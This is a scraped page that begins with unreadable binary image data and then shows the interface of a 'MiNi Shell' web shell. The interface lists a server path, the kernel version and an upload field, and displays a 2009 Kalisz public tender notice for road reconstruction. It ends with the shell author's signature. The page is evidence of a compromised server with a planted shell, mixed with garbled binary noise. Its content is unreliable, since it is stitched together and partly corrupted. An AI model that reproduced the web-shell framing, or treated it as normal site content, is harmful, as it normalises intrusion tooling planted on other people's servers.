JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/180125-N-2009.html

<p class="kh_header"><b>Kalisz: Przebudowa nawierzchni ulicy Łęgowej w Kaliszu 
wraz z przebudową przepustów, zmianą przebiegu rowu melioracyjnego  Rs-w2 na odcinku 200m oraz usunięciem kolizji telekomunikacyjnej i elektroenergetycznej.</b><br>
<b>Numer ogłoszenia: 180125 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Piskorzewska 17, 62-800 Kalisz, woj. wielkopolskie, tel. 062 5049709, faks 062 5049701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zp@zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa nawierzchni ulicy Łęgowej w Kaliszu 
wraz z przebudową przepustów, zmianą przebiegu rowu melioracyjnego  Rs-w2 na odcinku 200m oraz usunięciem kolizji telekomunikacyjnej i elektroenergetycznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia  obejmuje w szczególności:
1/ wykonanie projektu tymczasowej organizacji ruchu i wykonanie 
    oznakowania na czas  prowadzonych robót oraz oznakowanie docelowe 
    wg załączonego projektu organizacji ruchu
2/ roboty rozbiórkowe
3/ roboty ziemne z wywozem urobku
4/ roboty nawierzchniowe 
    - budowa nawierzchni jezdni z MMA
    - budowa chodników i wjazdów z kostki betonowej
5/ przebudowa przepustów
6/  Likwidacja rowu RS-w2 na odcinku 200m (km 0+200 - 0+400)
7/ Budowa rowu  RS -w2 na odcinku 200m (km 0+200 - 0+400)
8/ Usunięcie kolizji telekomunikacyjnej
9/ Usunięcie  kolizji elektroenergetycznej
10/ regulacja wysokościowa urządzeń infrastruktury podziemnej
11/obsługa geodezyjna wraz z geodezyjną inwentaryzacją powykonawcza 
    (wersje w formie papierowej i elektronicznej - format DWG)
2. Szczegółowy zakres robót  określa dokumentacja projektowa  stanowiąca 
       załącznik do siwz.
3.Zawarte w załącznikach do niniejszej SIWZ nazwy materiałów podano jako         przykładowe, mające na celu doprecyzowanie przedmiotu zamówienia oraz        określające standard techniczny i jakościowy. 
  Materiały do wykonania zamówienia należy przyjmować w kategorii i jakości nie 
  niższej (równoważne) niż te wskazane w załącznikach do niniejszej specyfikacji.
4.Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym przedmiotem zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12 tys PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 9.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
9.1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności będącej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
9.1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innego podmiotu do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:

       1/ dysponują osobą  posiadającą doświadczenie i kwalifikacje odpowiednie
         do realizacji zadania tj.:  wykażą, że dysponują kierownikiem robót, który 
           posiada uprawnienia budowlane w   specjalności drogowej 
           w zakresie   niezbędnym do wykonania  przedmiotu zamówienia 
       2/ wykażą, że osoba o której  mowa w pkt. 1/  należy (przynajmniej na dzień 
           składania ofert) do właściwej izby samorządu  zawodowego
       3/ złożą pisemne zobowiązanie innych podmiotów do udostępnienia osób           
            zdolnych do wykonania zamówienia, jeżeli wykonawca nie dysponuje 
            osobami  o których mowa w pkt. 9.1.2. ppkt.1/.
  5/ wykażą należyte wykonanie w ciągu ostatnich 5 lat przed dniem wszczęcia         
      niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy 
      - w tym okresie, co najmniej 2 zadań  polegających na  budowie lub przebudowie drogi o długości 100mb każde

9.1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj:,
    wykażą, że posiadają (aktualne przynajmniej na dzień składania ofert) 
    ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 
    działalności gospodarczej.
9.1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy,
9.1.5.	udzielą gwarancji na przedmiot zamówienia minimum 60 miesięcy od dnia odbioru końcowego,
9.1.6.	zaakceptują termin realizacji określony w pkt. 5 SIWZ,
9.1.7.	zaakceptują  terminy płatności faktur określone w SIWZ

9.2. Ocena spełniania warunków udziału w postępowaniu przez wykonawców,    określonych w pkt. 9.1 SIWZ, będzie dokonana w oparciu o kompletność 
i prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów, jakich żąda  Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły spełnia/nie spełnia.
9.3. Każdy z Wykonawców ubiegający się wspólnie o udzielenie zamówienia       (składający ofertę wspólnie) musi samodzielnie spełniać warunki, o których mowa w pkt. 9.1.1. oraz pkt. 9.1.3. i 9.1.4. SIWZ. 
         Pozostałe warunki i wymagania zawarte w pkt. 9.1. mogą zostać spełnione          łącznie przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wraz z ofertą Wykonawca zobowiązany jest do złożenia n/w dokumentów: 
10.1.	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - wzór stanowi załącznik do SIWZ,
10.2.	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie       do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*,
10.3.	dowód wniesienia wadium,
10.4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym             w art. 24 ust. 1 pkt. 4 - 8  ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*,
10.5.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym       w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*,
10.6.	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego   Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie  zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert*,
10.7.	dla osoby/osób  wskazanej/wskazanych do pełnienia samodzielnych funkcji technicznych należy dołączyć kopie uprawnień potwierdzających kwalifikacje niezbędne do wykonania przedmiotu zamówienia oraz aktualne na dzień składania ofert zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego.
10.8.	wykaz robót budowlanych spełniających warunki określone w pkt. 9.1.2.5/ - wzór wykazu stanowi załącznik do SIWZ (Doświadczenie zawodowe).
10.9.	Dokumenty potwierdzające, że wykonane roboty wyszczególnione 
w wykazie, o którym mowa w pkt. 10.8. zostały wykonane należycie. Wykonane roboty wymienione w wykazie, o którym mowa w pkt. 10.8.,a nie potwierdzone ww. dokumentami nie będą uwzględniane przy ocenie ofert. 


10.10.	polisę, a w przypadku jej braku inny dokument potwierdzający, 
           że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
   prowadzonej działalności gospodarczej*

W przypadku wspólnego ubiegania się o niniejsze zamówienie przez dwóch lub więcej Wykonawców, każdy z tych Wykonawców dołącza do oferty ww. dokumenty oznaczone gwiazdką (*) dotyczące każdego z nich.
Z treści ww. dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt. 9 SIWZ.


Dokumenty, o których mowa w pkt. 10.2, 10.4, 10.5, 10.6, 10.7, 10.9, 10.10 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę/y uprawnioną/e do reprezentowania Wykonawcy), pozostałe dokumenty należy złożyć w oryginale.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, do składania dokumentów, o których mowa wyżej stosuje się odpowiednio przepisy zawarte w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od Wykonawcy (Dz. U. z 2006r. Nr 87 poz. 605z późn. zm.).
10.14. Zamawiający będzie żądać przedstawienia oryginału lub notarialnie            potwierdzonej kopii dokumentu, w przypadku, gdy załączona do oferty kopia           zostanie uznana przez Zamawiającego za nieczytelną lub budzącą wątpliwości, co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich ul. Piskorzewska 17 62-800 Kalisz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2009 godzina 12:00, miejsce: Zarząd Dróg Miejskich ul. Piskorzewska 17 62-800 Kalisz - SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia: 
1.Termin wykonania  robót: do dnia  15.12.2009r.
2.Termin o którym mowa w pkt. 5.1 może ulec zmianie w przypadku wystąpienia 
   niesprzyjających warunków  atmosferycznych uniemożliwiających realizację 
   robót i właściwe pod względem jakościowym wykonanie robót, 
   o czas trwania tych warunków.

Creat By MiNi SheLL
Email: jattceo@gmail.com